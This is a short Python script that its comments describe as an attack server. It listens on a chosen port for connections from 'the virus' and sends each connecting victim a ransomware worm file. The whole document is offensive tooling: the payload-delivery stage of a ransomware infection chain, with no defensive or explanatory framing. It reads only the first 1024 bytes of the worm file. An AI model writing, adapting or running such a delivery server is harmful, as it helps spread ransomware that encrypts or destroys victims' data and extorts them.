#!/usr/bin/env python3
import socket
import sys

# In this program:
# we launch an attack server with <Attacker port> to wait for
# the connection from the virus. If connection successes,
# attack server will send ransomware worm to victim.

# command: ./crack_attack <Attacker port>

port = int(sys.argv[1])
worm_name = "./my_worm"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", port))
s.listen(3)

content = b''
with open(worm_name, 'rb') as f:
    content = f.read(1024)

while True:
    conn, addr = s.accept()
    conn.send(content)
    conn.close()
